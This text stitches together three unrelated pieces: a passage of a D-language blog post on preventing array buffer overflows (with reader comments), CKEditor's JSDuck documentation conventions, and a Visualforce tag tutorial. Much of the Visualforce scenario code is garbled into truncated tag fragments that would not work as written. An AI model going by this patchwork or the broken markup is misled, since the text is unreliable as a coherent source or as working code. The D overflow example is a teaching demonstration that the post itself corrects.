and with that the example becomes:

```d
import core.stdc.stdio;

extern (C):   // use C ABI for declarations

enum MAX = 10;

int sumArray(int[] a) {
    int sum = 0;
    for (int i = 0; i <= MAX; ++i)
        sum += a[i];
    return sum;
}

int main() {
    __gshared int[MAX] values = [ 7,10,58,62,93,100,8,17,77,17 ];
    printf("sum = %d\n", sumArray(values));
    return 0;
}
```

Compiling:

```
dmd -betterC sum.d
```

Running:

```
./sum
Assertion failure: 'array overflow' on line 11 in file 'sum.d'
```

That’s more like it. Replacing the `<=` with `<` we get:

```
./sum
sum = 449
```

What’s happening is the dynamic array `a` is carrying its dimension along with it and the compiler inserts an array bounds overflow check.

But wait, there’s more.
There’s that pesky `MAX` thing. Since the `a` is carrying its dimension, that can be used instead:

```d
for (int i = 0; i < a.length; ++i)
```

This is such a common idiom, D has special syntax for it:

```d
foreach (value; a)
    sum += value;
```

The whole function `sumArray()` now looks like:

```d
int sumArray(int[] a) {
    int sum = 0;
    foreach (value; a)
        sum += value;
    return sum;
}
```

and now `sumArray()` can be reviewed in isolation from the rest of the program. You can get more done in less time with more reliability, and so can justify getting a pay raise. Or at least you won’t have to come in on weekends on an emergency call to fix the bug.

“Objection!” you say. “Passing `a` to `sumArray()` requires two pushes to the stack, and passing `p` is only one. You said no compromise, but I’m losing speed here.”

Indeed you are, in cases where `MAX` is a manifest constant, and not itself passed to the function, as in:

```d
int sumArray(int *p, size_t length);
```

But let’s get back to “no compromise.” D allows parameters to be passed by reference, and that includes arrays of fixed length. So:

```d
int sumArray(ref int[MAX] a) {
    int sum = 0;
    foreach (value; a)
        sum += value;
    return sum;
}
```

What happens here is that `a`, being a `ref` parameter, is at runtime a mere pointer. It is typed, though, to be a pointer to an array of `MAX` elements, and so the accesses can be array bounds checked. You don’t need to go checking the callers, as the compiler’s type system will verify that, indeed, correctly sized arrays are being passed.

“Objection!” you say. “D supports pointers. Can’t I just write it the original way? What’s to stop that from happening?
I thought you said this was a mechanical guarantee!”

Yes, you can write the code as:

```d
import core.stdc.stdio;

extern (C):   // use C ABI for declarations

enum MAX = 10;

int sumArray(int* p) {
    int sum = 0;
    for (int i = 0; i <= MAX; ++i)
        sum += p[i];
    return sum;
}

int main() {
    __gshared int[MAX] values = [ 7,10,58,62,93,100,8,17,77,17 ];
    printf("sum = %d\n", sumArray(&values[0]));
    return 0;
}
```

It will compile without complaint, and the awful bug will still be there. Though this time I get:

```
sum = 39479
```

which looks suspicious, but it could have just as easily printed 449 and I’d be none the wiser. How can this be guaranteed not to happen? By adding the attribute `@safe` to the code:

```d
import core.stdc.stdio;

extern (C):   // use C ABI for declarations

enum MAX = 10;

@safe int sumArray(int* p) {
    int sum = 0;
    for (int i = 0; i <= MAX; ++i)
        sum += p[i];
    return sum;
}

int main() {
    __gshared int[MAX] values = [ 7,10,58,62,93,100,8,17,77,17 ];
    printf("sum = %d\n", sumArray(&values[0]));
    return 0;
}
```

Compiling it gives:

```
sum.d(10): Error: safe function 'sum.sumArray' cannot index pointer 'p'
```

Granted, a code review will need to include a grep to ensure `@safe` is being used, but that’s about it.

In summary, this bug is vanquished by preventing an array from decaying to a pointer when passed as an argument, and is vanquished forever by disallowing indirections after arithmetic is performed on a pointer. I’m sure a rare few of you have never been blasted by buffer overflow errors. Stay tuned for the next installment in this series. Maybe your moat got breached by the next bug! (Or maybe your tool doesn’t even have a moat.)

## 4 thoughts on “Vanquish Forever These Bugs That Blasted Your Kingdom”

Is there any significant reason why `__gshared` is being used when initializing `values` in your example? Regardless, I’m looking forward to future entries in this series!

I don’t get it. Where have all the goto’s gone?

From Reddit [1]:

> static declarations are put in TLS (thread local storage).
[1]

Reminds me of a bug I ran into recently while using the dmd lexer in a project. When I passed any valid file to the lexer it worked fine. When I passed a batch of valid files to the lexer, after a few files were processed, it started to spit out all kinds of errors about invalid Unicode code-points and ghost tokens. All those locations were past EOF. When I passed in that particular file individually it worked like a charm. When I over-sized the buffer that held a file by one char and set that to 0 it worked for the batch of files.
# Code Documentation Standards

Starting from version 4 CKEditor uses a customized version of JSDuck as code documentation generator; previously JSDoc was used. JSDuck’s comment format differs from JSDoc’s and both generators have different feature lists. Thus, with the CKEditor 4 release, the entire source code documentation was reformatted in a new, consistent way. The resulting CKEditor API documentation is always available at.

# Useful Links

- CKEditor JSDuck customization
- JSDuck GitHub page
- JSDuck Wiki
- Tags list
- Markdown format - basics
- CKEditor API documentation

# JSDuck vs JSDoc — Important Differences

- JSDuck supports Markdown. HTML entities may still be used, but try to avoid them in favor of Markdown. Note that HTML in code samples and pre-formatted text will be encoded.
- JSDuck does not accept the following tags: `@namespace`, `@name`, `@constant`, `@augments`, `@field`, `@type` (deprecated), `@default` and more (only those that CKEditor 3 was using are listed).
- JSDuck accepts some new tags: `@cfg`, `@member`, `@chainable`, `@inherits`, `@method`, `@mixins`, `@readonly`, `@singleton`, and more.
- Some common tags have a different format in JSDuck (e.g. `@example` creates live examples; standard code samples are just indented).
- JSDuck does not parse code searching for classes and properties. It will therefore only find those API elements which have at least their preceding `/** */` doc comments.
- JSDuck recognizes API element names (methods, classes, events, configuration variables, properties, etc.), method definitions (with argument lists), and properties (their type and default value, too, if possible). Thus, in some cases this information does not have to be specified.
- Classes’ definitions can be opened multiple times — it is useful when class methods and properties are defined in more than one file or place in the code.
- There is no list of files in JSDuck, so old `@license` and `@fileOverview` tags are kept for other purposes (and thanks to custom tags they work in JSDuck like `@ignore`).
- There are no namespaces in JSDuck, so the packages tree is auto-generated based on the classes tree and @membertags. - All properties, events, etc. defined under the class definition will be assigned to this class, so there is no need to specify @member. # Documentation Formats # File Header The @license and @fileOverview tags are legacy comments that will not be parsed by JSDuck. /** * @license Copyright (c) 2003-2019, CKSource - Frederico Knabben. All rights reserved. * For licensing, see LICENSE.md or */ /** * @fileOverview Defines the {@linkapi CKEDITOR.editor} class that represents an * editor instance. */ Note: Since @fileOverview comments are ignored, they have not been reformatted, so they may still contain the old JSDoc format. # Class This is an example of a class definition. It contains so many tags to show their correct order. /** * Represents an editor instance. This constructor should be rarely * used, in favor of the {@linkapi CKEDITOR} editor creation functions. * * ```js * var editor = new {@linkapi CKEDITOR.editor}(); * editor.setSomething( name, { * value: 1 * } ); * ``` * * @since 3.0 * @private * @class {@linkapi CKEDITOR.editor} * @extends {@linkapi CKEDITOR.parent} * @mixins {@linkapi CKEDITOR.event} * @mixins {@linkapi CKEDITOR.whatever} * @constructor Creates an editor class instance. * @param {Object} [instanceConfig] Configuration values for this specific instance. * @param {Number} [mode={@linkapi CKEDITOR.SOURCE_MODE}] The element creation mode to be used by this editor. * * Possible values are: * * * {@linkapi CKEDITOR.SOURCE_MODE} - description 1, * * {@linkapi CKEDITOR.WYSIWYG_MODE} - description 2 long long long * long long long long long, * * CKEDITOR.ANOTHER_MODE - description 3. * * @param {CKEDITOR.dom.element} [element] The DOM element upon which this editor * will be created. */ CKEDITOR.editor = function( ) { // ... A minimal class documentation: /** * Represents an editor instance. 
This constructor should be rarely
 * used, in favor of the {@linkapi CKEDITOR} editor creation functions.
 *
 * @class
 */
CKEDITOR.editor = function() {
	// ...

When you want to reopen the class declaration in another file, use this:

/** @class {@linkapi CKEDITOR.editor} */

# Details

The order of tags may look strange, but you can remember it thanks to the following description: Since 3.0 there is a private class CKEDITOR.editor which extends CKEDITOR.parent and mixins CKEDITOR.event and CKEDITOR.whatever. It has a private constructor (switched order — explained later in the tags list) which accepts the following parameters: …

Important tag details:

By default private classes will not be visible in the packages tree.

A good example of the difference between “mixins” and “extends” is that event is mixed into various other classes, while the CKEDITOR.dom.* structure is based on extending parent classes.

A constructor is in fact a separate documentation “instance”, because it will be listed with methods. Thus, it may have its own @private, but it has to be placed below it, because everything before will be a part of the class description. However, two @private tags in one comment will not be accepted by JSLinter, so in this case the documentation should be split into two comments. A constructor can also be declared completely independently from the class, which is useful when CKEDITOR.tools.createClass has been used.

# Property and Configuration Variable

The following is an example of property documentation.

/**
 * A unique identifier of this editor instance.
 *
 * **Note:** It will be originated from the ID or the name
 * attribute of the `element`, otherwise a name pattern of
 * 'editor{n}' will be used.
 *
 * @private
 * @readonly
 * @static
 * @property {String/Boolean} [complicatedName=default value]
 * @member {@linkapi CKEDITOR.editor}
 */
obj[ 'complicated' + 'Name' ] = this.name || genEditorName();

A minimal property documentation:

/**
 * Property description (even this may be omitted, but it is better to always describe a property).
 */
this.propertyName = 'value';

Which will be recognized as @property {String} [propertyName='value'] by JSDuck and will be assigned to the class defined earlier in the file.

Partial:

/**
 * Property description.
 *
 * @property {String} [=config.something (value taken from configuration)]
 */
this.propertyName = this.config.something;

Basic:

/**
 * Property description.
 *
 * @property propertyName
 */
this.propertyName = this.config.something;

# Details

- JSDuck type definitions are awesome — read more about them.
- Property names, types, and default values may be recognized automatically.
- The default value does not have to be JavaScript code, so in the “Partial” example JSDuck will print: “Defaults to: config.something (value taken from configuration)”.
- If a property is not defined below a class definition or if it belongs to a different class, then @member has to be used. Specifying a namespace in @property is not possible.

# Configuration Variables

To define a configuration variable instead of a property:

- Use @cfg instead of @property. The format is the same. @private, @readonly and @static may not work (they have not been tested).

# Method and Event

The following is an example of method documentation.

/**
 * The {@linkapi CKEDITOR.dom.element} representing an element. If the
 * element is a native DOM element, it will be transformed into a valid
 * {@linkapi CKEDITOR.dom.element} object.
 *
 * ```js
 * var element = new {@linkapi CKEDITOR.dom.element}( 'span' );
 * alert( element == {@linkapi CKEDITOR.dom.element.get}( element ) ); // true
 *
 * var element = document.getElementById( 'myElement' );
 * alert( {@linkapi CKEDITOR.dom.element.get}( element ).getName() ); // (e.g.) 'p'
 * ```
 *
 * @private
 * @static
 * @method complicatedName
 * @member {@linkapi CKEDITOR.editor}
 * @param {String/Object} element Element's ID or name or a native DOM element.
 * @param {Function} fn Callback.
 * @param {String} fn.firstArg Callback's first argument.
 * @param {Number} fn.secondArg Callback's second argument.
 * @param {String} [name='default value']
 * @returns {CKEDITOR.dom.element} The transformed element.
 */
this[ 'complicated' + 'Name' ] = ( function() {
	return function() {};
}() );

Typical:

/**
 * Method description.
 *
 * @param {String/Object} element Element's ID or name or a native DOM element.
 * @param {String} [name='default value']
 * @returns {CKEDITOR.dom.element} The transformed element.
 */
this.methodName = function() {
	// ...
};

# Details

- The @method tag has to be used when it is not clear that a piece of code is a method (e.g. a closure returning a function was used or a reference to a function defined elsewhere) or when the method’s name is not obvious.
- Callback arguments may be defined. Also, if a method returns an object, its properties may be defined too — read more.
- Both @return and @returns are accepted, but use the latter one.

# Events

To define an event instead of a method:

- Use @event instead of @method — usually you will have to provide a name. @returns is not accepted.

# Miscellaneous Rules

- Always leave one blank line between the textual comment and the first tag.
- Separate all blocks (paragraphs, code samples, etc.) with one blank line.
- Code samples are wrapped with triple back ticks ```, optionally followed by a language identifier — no spaces are to be used.
- Always place a dot (.) at the end of a sentence.
A sentence starts with an upper-case letter.
- Always use single quotes for JavaScript strings, but double quotes for cites, irony, etc. in textual comments.
- The cross-reference format for links is: CKEDITOR.name.space#property. If there is more than one event/property/configuration/method with the same name, then prepend cfg-, property-, method- or event- to the name. The namespace may be omitted if it equals the @member value or the current class. See the “Cross-references” section in JSDuck’s guide.
- Use the real format in default values: CKEDITOR.name.space.property.
- When describing the value returned or alerted in a code sample, wrap only strings in ''. All other types (Booleans, numbers, objects, etc.) should be left unwrapped.
- There is no Integer type in JavaScript, and constructors’ names should be used as type names — so Boolean, not boolean.
- In textual comments wrap tokens, names from code, JavaScript values, etc. with `` for better visibility. Remember to wrap strings with '' — so: This method may return: `'text text'`.
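As a quick recap of the rules above, a complete doc comment for a hypothetical method might look as follows. The method name getContainer and its description are invented for illustration only; they are not taken from the CKEditor source.

/**
 * Returns the container element of this editor instance.
 *
 * **Note:** The returned value is a {@linkapi CKEDITOR.dom.element},
 * not a native DOM element.
 *
 * ```js
 * var container = editor.getContainer();
 * alert( container.getName() ); // e.g. 'div'
 * ```
 *
 * @returns {CKEDITOR.dom.element} The editor container.
 */

Note how the textual comment and the first tag are separated by one blank line, the code sample is wrapped in triple back ticks with a language identifier, every sentence ends with a dot, and the alerted string value is wrapped in ''.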
https://ckeditor.com/docs/ckeditor4/latest/guide/dev_code_documentation.html
Tags Used to Create Visualforce Pages

1). <apex:page>: This is a very important tag of a Visualforce page. Every Visualforce page and all of its components must be wrapped inside a single <apex:page> tag.

Attributes of the <apex:page> tag are:

- action: Invoked when this page is requested by the server. Here we must use expression language to reference an action method, action="{!doAction}", which must be defined in an Apex class. E.g. action="{!init}" initializes the page, or action="{!redir}" redirects the page to the new page referred to.
- controller: A string; the name given here must be implemented in an Apex class. Controller here means a custom controller; this attribute cannot be used if we use a standard controller, e.g. <apex:page controller="string">.
- extensions: Used to extend controllers; we can have any number of extensions for a custom controller, and they are used to add extra functionality, e.g. <apex:page controller="string" extensions="string">.
- id: A string; gives an identification for the tag. We can specify any name, but it should not be a duplicate. It is generally used to refer to this page from other components on the page.
- recordSetVar: A string; this attribute indicates that the page uses a set of records provided by a standard controller only. It is used to handle multiple records and converts a standard controller into a standard list controller.
- renderAs: A string; the name of any supported content converter. We can change the display to 'pdf' or another type, though currently 'pdf' is the only supported format. E.g. <apex:page renderAs="pdf"> displays the page in PDF format.
- rendered: A Boolean; related to the displaying of the page. By default it is true; if we set it to false the page will not be displayed.
- setup: A Boolean; specifies whether the page should use the standard salesforce.com setup styling if true. By default it is false, so the setup styling is not applied.
- showHeader: A Boolean; displays or hides the standard Salesforce header when true or false respectively.
- sidebar: A Boolean; displays or hides the sidebar of the standard Salesforce site.
- standardController: The Salesforce object that is used to control the behaviour of this page. This attribute cannot be specified if a custom controller is used, e.g. <apex:page standardController="Account">.
- standardStylesheets: A Boolean; decides whether the standard Salesforce style sheets are added to the generated page header when the showHeader attribute is set to false. If it is set to true, the standard style sheets are added to the generated page header by default.

The other important attributes are tabStyle, title, helpUrl and helpTitle.

2). <apex:form>: A section of a Visualforce page that allows users to enter input and then submit it with an <apex:commandButton> or <apex:commandLink>. The body of the form determines the data that is displayed and the way it is processed.

Attributes of this tag are:

- accept: A string; a comma-separated list of content types that a server processing this form can handle.
- acceptcharset: A string; a comma-separated list of character encodings that a server processing this form can handle.
- dir: A string; specifies the direction in which the components of the form on a Visualforce page should be displayed, either RTL (right to left) or LTR (left to right).

onclick, ondblclick, onkeydown, onkeypress, onkeyup, onmousedown, onmouseout, onmousemove, onmouseup, onreset, onsubmit: these are the general JavaScript-enabled attributes that can be used within the form tag. They all specify when a piece of JavaScript in our design should be invoked: on a click, a double click, a key press, a mouse move, and so on.
onreset and onsubmit are particularly important: their JavaScript is invoked when a reset or submit event occurs, i.e. when the user clicks the reset or submit button.

3). <apex:pageBlock>: An area of a page that uses styles similar to the appearance of a Salesforce detail page, without any default content. On a detail page the components can only be laid out in two columns; here we can have any number of columns by using page block sections. We can also reference instances rather than full object names, i.e. <apex:pageBlock> ... </apex:pageBlock>.

Attributes are:

- dir: The direction of display, 'RTL' or 'LTR'.
- helpTitle: A string; the text of the title displayed when a user hovers the mouse over the help link for the page block. It must be used together with helpUrl.
- helpUrl: A string; the URL of a web page that provides help for the page block.

The same JavaScript-enabled attributes as on the form tag can be used here too: onclick, ondblclick, onkeydown, onkeypress, onkeyup, and so on.

4). <apex:facet name="...">: A tag used to name a content area of its parent component, such as the header or footer of an <apex:pageBlock>. It overrides the corresponding attribute-based properties of the <apex:pageBlock> section, such as the JavaScript-enabled attributes, title, help text and help URL. The facet content can be added in both positions, header and footer:

- footer: The components that appear at the bottom of the page block.
- header: The components that appear as the header of the page block.

5). <apex:pageBlockSection>: This tag can be used to create sections within a page block to categorize different fields into different sections. It is similar to adding a section through an edit-page-layout assignment. Each column in these sections spans two cells: one for the field label, and another for its value. Each component found in the body of an <apex:pageBlockSection> is placed into the next cell in a row until the number of columns is reached.
To add fields to an <apex:pageBlockSection> we use the <apex:inputField> or <apex:outputField> components; each of these components automatically displays with the field's associated label.

Attributes:

- collapsible: A Boolean; specifies whether the page block section can be expanded and collapsed by a user. By default it is true.
- columns: An integer; specifies the number of columns that can be included in a single row of a page block section. A single column spans two cells: one for the field label, and another for its value.
- dir: The direction, RTL or LTR.
- showHeader: A Boolean value that specifies whether the page block section title is displayed, if it is true.

6). <apex:pageBlockSectionItem>: A single piece of data in an <apex:pageBlockSection> that takes up one column in one row. An <apex:pageBlockSectionItem> component can include up to two child components. If no content is specified, the content spans both cells of the column. If two child components are specified, the content of the first is rendered in the left "label" cell of the column, while the content of the second is rendered in the right "data" cell of the column.

Example: if we include an <apex:outputField> or an <apex:inputField> component in an <apex:pageBlockSectionItem>, these components do not display with their label or custom help text as they do when they are direct children of an <apex:pageBlockSection>. These components also cannot be rerendered directly; rerender the child components instead.

Attributes: dir, helpText, id, and:

- labelStyle: A string; the style used to display the content of the left "label" cell of the page block section column. All of the JavaScript-enabled attributes discussed above are supported as well.

7). <apex:pageBlockButtons>: A set of buttons that are styled like standard Salesforce buttons. The component must be a child of an <apex:pageBlock>. This tag creates buttons and places them in the page block title area and footer area.
Here we can specify the location of the buttons in a section: either top or bottom.

Attributes are dir, and:

- location: The area of the page block where the buttons should be rendered. Possible values are "top", "bottom" or "both"; by default it is set to "both". This can be overridden when we use a facet (header/footer).

8). <apex:commandButton>: A button that is rendered as an HTML input element with the type attribute set to "submit", "reset" or "image", depending on the values specified on the <apex:commandButton> tag. The button executes an action and must be a child of an <apex:form> component, e.g. <apex:commandButton action="{!save}" value="Save"/>.

Attributes:

- accesskey: A string; a keyboard access key that puts the command button in focus.
- action: An ApexPages.Action; this is invoked via an AJAX request to the server and uses merge-field syntax to reference the method. action="{!save}" references the save method written in the controller. If action is not specified, the page simply refreshes.
- dir, id, disabled.
- image: A string; the absolute or relative URL of the image displayed as this button. If specified, the type of the generated HTML input element is set to "image". All of the JavaScript-enabled attributes are supported.
- rendered: A Boolean value that specifies whether the component is rendered on the page. If not specified, it defaults to true.
- timeout: An integer; the amount of time (in milliseconds) before an AJAX update request should time out.
- value: An object; the text displayed on the command button as its label.

9). <apex:message>: This tag can be used to display custom error messages on a Visualforce page. If it is not included, the errors can be seen only in the debug log.

10).
<apex:messages>: Displays all messages that were generated for all components on the current page (standard Salesforce-style error messages). The default style name is "error".

11). <apex:pageMessage>: This component should be used for presenting custom messages in the page using the Salesforce pattern for errors, warnings and other types of messages of a given severity.

Attributes are:

- detail: A string; the detailed description of the error information.
- severity: A string; the values supported are 'confirm', 'info', 'warning' and 'error'. It controls the severity of the error message displayed.
- strength: An integer; the strength of the message, which controls the visibility and size of the icon displayed next to the message. Use 0 for no image, or 1-3 (3 is the highest strength, with the largest icon).
- summary: A string; the summary message.

12). <apex:pageMessages>: This component displays all messages that were generated for all components on the current page, presented using the Salesforce styling.

Attributes:

- escape: A Boolean value specifying whether sensitive HTML and XML characters should be escaped in the HTML output generated by this component.
- showDetail: A Boolean; specifies whether the detail portion of the messages is displayed. By default it is false.

13). <apex:detail>: This is a self-contained and very powerful tag: it displays the detail page of a particular object. The component includes attributes for including or excluding the associated related lists, related-list hover links, and the title bar that appear on the standard Salesforce detail page.

Attributes:

- inlineEdit: A Boolean; controls whether the component supports inline editing or not.
- relatedList: A Boolean; specifies whether the related lists are included in the rendered component.
- relatedListHover: A Boolean that specifies whether the related-list hover links are included in the rendered component.
(This requires "Enable Related List Hover Links" to be selected under Setup | Customize | User Interface.)

- id: A string; an identifier that allows the detail component to be referenced by other components on the page.
- rendered: A Boolean value that specifies whether the component is rendered on the page; by default it is true.
- rerender: An object; the ID of one or more components that are redrawn when the result of an AJAX update request returns to the client. Note: this only works if inlineEdit or showChatter is set to true.

14). <apex:panelBar>: This tag creates a panel bar on a Visualforce page which can accommodate multiple panels. It can include up to 1,000 <apex:panelBarItem> tags.

Attributes:

- height: A string; the height of the panel bar when expanded, expressed either as a percentage of the available vertical space (height="50%") or as a number of pixels (height="200px").
- switchType: A string; the implementation method for switching between panel bar items. The possible values are "client", "server" and "ajax".
- value: An object; the ID of the panel bar item that is displayed.
- var: A string; the name of the variable that represents one element in the collection of data specified by the items attribute. We can then use this variable to display the element itself in the body of the panel bar component tag.
- width: Controls the width of the panel bar, expressed either as a percentage of the available horizontal space or as a number of pixels. If not specified, the default is "100%".

15). <apex:panelBarItem>: A section of an <apex:panelBar> that can expand or collapse when a user clicks the section header. When expanded, the header and the content of the <apex:panelBarItem> are displayed; when collapsed, only the header of the <apex:panelBarItem> displays.
Attributes:

- expanded: A Boolean; specifies whether the content of this panel bar item is displayed.
- label: A string; the text displayed as the header of the panel bar item component.
- onenter: A string; JavaScript invoked when the panel bar item is not selected and the user clicks on the component to select it.
- onleave: A string; JavaScript invoked when the user selects a different panel bar item.

16). <apex:tabPanel>: A page area that displays as a set of tabs. When a user clicks a tab header, the tab's associated content displays, hiding the content of the other tabs. It creates a panel which can accommodate multiple tabs.

Attributes are:

- activeTabClass: A string; the style class used to display a tab header in the tab panel when it is selected, used primarily to designate which CSS styles are applied when using an external CSS style sheet. In other words, an HTML style name which controls the look and feel of the tab that is currently selected.
- inactiveTabClass: Controls the look and feel of inactive tabs.
- selectedTab: The name of the tab that is selected first when the page is displayed to the user; it will be the default tab when the page loads.
- headerAlignment: Left or right. We can also adjust the spacing between tabs through headerSpacing.

17). <apex:tab>: This component must be a child of an <apex:tabPanel>.

Attributes are:

- id: A string; an identifier that allows the tab component to be referenced by other components on the page.
- immediate: A Boolean; specifies whether the action associated with this component happens immediately, without processing any validation rules associated with the fields on the page. If set to true, the action happens immediately and validation rules are skipped; by default it is false. The tab also supports all of the JavaScript-enabled attributes such as onclick, ondblclick, and so on.
Output tags:

18) <apex:outputField>
19) <apex:outputLabel>
20) <apex:outputLink>
21) <apex:outputText>

To display views:

22) <apex:listViews>
23) <apex:enhancedList>

24) <apex:sectionHeader>: A title bar for a page. On a standard salesforce.com page, the title bar is a colored header displayed directly under the tab bar.

Attributes are:

- description: A string; descriptive text for the page that displays just under the colored title bar.
- printUrl: A string; the URL of the printable view.
- subtitle: The text displayed just under the main title in the colored title bar.

25). <apex:selectCheckboxes>: A set of related checkbox input elements, displayed in a table.

Attributes are:

- accesskey: A string; the keyboard access key that puts the checkboxes component in focus.
- layout: A string; the method by which the checkboxes should be displayed in the table. Possible values are "lineDirection" (checkboxes are placed horizontally) and "pageDirection" (placed vertically). By default its value is "lineDirection".

26). <apex:selectList>: A list of options that allows users to select only one value or multiple values at a time, depending on the value of its multiselect attribute.

Attributes are:

- multiselect: A Boolean; specifies whether users can select only one or more items from the list.
- tabindex: A string; the order in which this select list component is selected compared to other page components when a user presses the Tab key repeatedly. The value is an integer from 0 to 32767.

27). <apex:selectOption>: A possible value for an <apex:selectCheckboxes>, <apex:selectList> or <apex:selectRadio> component; it must be a child of one of those components. The number of checkboxes/radio buttons/list values is declared in the logic (an Apex method) in the controller part.
---> It uses the attributes discussed above.

28). <apex:selectOptions>: The same as <apex:selectOption>, except that it is bound to a collection of options; it has only three attributes: id, rendered, value.

29). <apex:selectRadio>: A set of related radio button input elements, displayed in a table. Unlike checkboxes, only one radio button can ever be selected at a time.

Tags used to invoke JavaScript using an AJAX request (Asynchronous JavaScript And XML). The tags are:

1). <apex:actionFunction>: A component that provides support for invoking a controller action method directly from JavaScript code using an AJAX request. An <apex:actionFunction> must be a child of an <apex:form>.

The difference: <apex:actionSupport> supports invoking a controller action method from other Visualforce components (it is referenced by other components), while <apex:actionFunction> defines a new JavaScript function which can then be called from within a block of JavaScript code.

Attributes are:

- action: An ApexPages.Action; the action method invoked when the actionFunction is called by a JavaScript event elsewhere in the page markup. We use merge-field syntax to reference the method. If an action is not specified, the page simply refreshes.
- name: A string; the name of the JavaScript function that, when invoked elsewhere in the page markup, causes the method specified by the action attribute to execute. When the action method completes, the components specified by the reRender attribute are refreshed.
- reRender: An object; the ID of one or more components that are redrawn when the result of the action method returns to the client: a comma-separated list of IDs, or a merge-field expression for a list or collection of IDs. (These components are redrawn after the execution of the method.)
- status: A string; the ID of an associated component that displays the status of an AJAX update request.
- timeout: An integer; the amount of time (in milliseconds) before an AJAX update request should time out.
- immediate: A Boolean value that specifies whether the action associated with this component should happen immediately, without processing any validation rules associated with the fields on the page. If set to true, validations are skipped; by default it is false.
- oncomplete: A string; the name of the JavaScript function invoked when the AJAX request completes.

2). <apex:actionPoller>: Performs a partial page refresh based on a time interval. The timer sends an AJAX update request to the server according to the time interval that we specify. (Do not use this with enhanced lists.) If an <apex:actionPoller> is ever re-rendered as the result of another action, it resets itself. It should be placed within the <apex:actionRegion> it acts upon.

Attributes are:

- action: An ApexPages.Action, invoked by the periodic AJAX update request from the component. We can use merge-field syntax to reference a method: action="{!incrementCounter}" references the incrementCounter() method in the controller. If action is not specified, the page simply refreshes.
- interval: The time interval between AJAX update requests, in seconds. The update can cover multiple fields at a time; this is written in the action logic.

3). <apex:actionRegion>: This tag helps us create a set of components that can be refreshed whenever some AJAX update is performed on a Visualforce page. It is an area of a Visualforce page that demarcates which components should be processed by the Force.com server: only the components inside an <apex:actionRegion> are processed by the server during an AJAX request. However, it does not define the area(s) of the page that are re-rendered when the request completes. To control that behavior, use the rerender attribute on an <apex:actionSupport>, <apex:actionPoller>, <apex:commandButton>, <apex:commandLink>, <apex:tab> or <apex:tabPanel> component.
Attributes are:

- id: A string; an identifier that allows the component to be referenced by other components on the page.
- renderRegionOnly: A Boolean value that specifies whether AJAX-invoked behaviour outside of the action region should be rendered when the action region is processed. By default it is set to true.

4). <apex:actionStatus>: A component that displays the status of an AJAX update request. An AJAX request can either be in progress or complete, and the message can be anything, such as "inserting", "update completed", "done", etc.

Attributes:

- startText: A string; the status text displayed at the start of the AJAX request, i.e. the message displayed once the action is invoked and before it completes.
- for: A string; the ID of the action region component for which the status indicator is displaying status.
- id: Allows the action status component to be referenced by other components on the page.
- stopText: The status text displayed when the AJAX request completes.

5). <apex:actionSupport>: A component that adds AJAX support to another component, allowing that component to be refreshed asynchronously by the server when a particular event occurs, such as a button click or mouse-over. (It creates a set of components that are refreshed whenever some update is performed on the Visualforce page.)

Attributes are:

- event: A string; the JavaScript event that generates the AJAX request. Possible values are "onblur", "onchange", "onclick", "ondblclick", "onfocus", "onkeydown", "onkeypress", and so on.
- focus: The ID of the component that is in focus after the AJAX request completes.
- status: A string; the ID of an associated component that displays the status of the AJAX update request.
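As an illustrative sketch of how these AJAX tags fit together, the page below refreshes an output panel via <apex:actionSupport> whenever a select list changes, with <apex:actionStatus> showing progress. The controller name, property and component IDs here are invented for this example, not taken from any standard library:

```
<apex:page controller="CityController">
  <apex:form>
    <!-- Shows "loading..." while the AJAX request is in progress -->
    <apex:actionStatus id="cityStatus" startText="loading..." stopText=""/>
    <apex:selectList value="{!selectedCity}" size="1">
      <apex:selectOptions value="{!cityOptions}"/>
      <!-- onchange sends an AJAX request and redraws only the panel below -->
      <apex:actionSupport event="onchange" reRender="cityPanel" status="cityStatus"/>
    </apex:selectList>
    <apex:outputPanel id="cityPanel">You selected: {!selectedCity}</apex:outputPanel>
  </apex:form>
</apex:page>
```

A minimal custom controller backing this page could look like:

```
public class CityController {
    public String selectedCity { get; set; }

    // Builds the options rendered by <apex:selectOptions>
    public List<SelectOption> getCityOptions() {
        return new List<SelectOption>{
            new SelectOption('HYD', 'Hyderabad'),
            new SelectOption('BLR', 'Bangalore')
        };
    }
}
```

Because only the component listed in reRender is redrawn, the rest of the page is left untouched by the AJAX round trip.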
Visualforce Scenarios

Visualforce Page Scenario 1: Create the Visualforce page called “Opportunity View” with the following code and override the “New” button on the Opportunity object with it. The result appears once we click on the Opportunity tab and click the “New” button.

<apex: <apex:form> <apex:pageBlock <apex:pageBlockButtons> <apex:commandButton </apex:pageBlockButtons> <apex:pageBlockSection <apex:inputField <apex:inputField <apex:inputField <apex:inputField <apex:inputField </apex:pageBlockSection> <apex:pageBlockSection <apex:inputField <apex:inputField <apex:inputField <apex: <apex:inputField </apex:pageBlockSection> </apex:pageBlock> </apex:form> </apex:page>

Now click on the Opportunity tab and click the “New” button.

Visualforce Page Scenario 2: Write a Visualforce page to view the Account related lists as tabs.

<apex: <style> activeTab {background-color: #236FBD; color:white;background-image:none} inactiveTab { background-color: lightgrey; color:black;background-image:none}</style> <apex: <apex:tab <apex: </apex:tab> <apex: <apex:relatedList </apex:tab> <apex: <apex:relatedList </apex:tab> <apex: <apex:relatedList </apex:tab> <apex:tab <apex:relatedList </apex:tab> </apex:tabPanel> </apex:page>

Create the button called “Tabbed Account” on the Account object. While creating the button, select “OnClick JavaScript” as the content source and write the following code:

parent.window.location.replace("/apex/RelatedListAsTabsDisplay?id={!Account.Id}");

Note: RelatedListAsTabsDisplay --> Visualforce Page Name

Once we click on the “Tabbed Account” button, we will get the following screen:

- Click on the Details tab --> to open the detail page
- Click on the Contacts tab --> to open the Contacts related list, and the same for Opportunities, Open Activities and Notes and Attachments

Explanation: The first step starts with the page tag. It includes standardController="Account", the header is enabled, and the tab style is that of Account.
- <style> is used to include style sheets; here we used them to display the active and inactive tabs. Active is blue colored and inactive is grey.
- We are taking a tab panel which consists of all the tabs of the account.
- switchType: the implementation method for switching between tabs; in general the operation is between client and server.
- selectedTab: the name of the default selected tab when the page loads. <apex:tab> defines the tab name, label and id.
- <apex:detail/> is a self-contained tag that gives the detail page for each account tab selected, and its relatedList attribute can be a Boolean one.
- <apex:relatedList>: here we used subject and list. The subject attribute specifies the parent record from which the related-list data has to be taken; in our case it is the Account. list is the name of the child object that should appear on the tab, i.e. the children of the account.

Note: Redirecting the Visualforce page to the list-view page uses a single tag: <apex:page

Visualforce Scenario 3: The following Visualforce page displays the Contacts for a particular account in a separate window, as a table (the format is a standard Salesforce page).

Page Name=”ContactsForAccount”

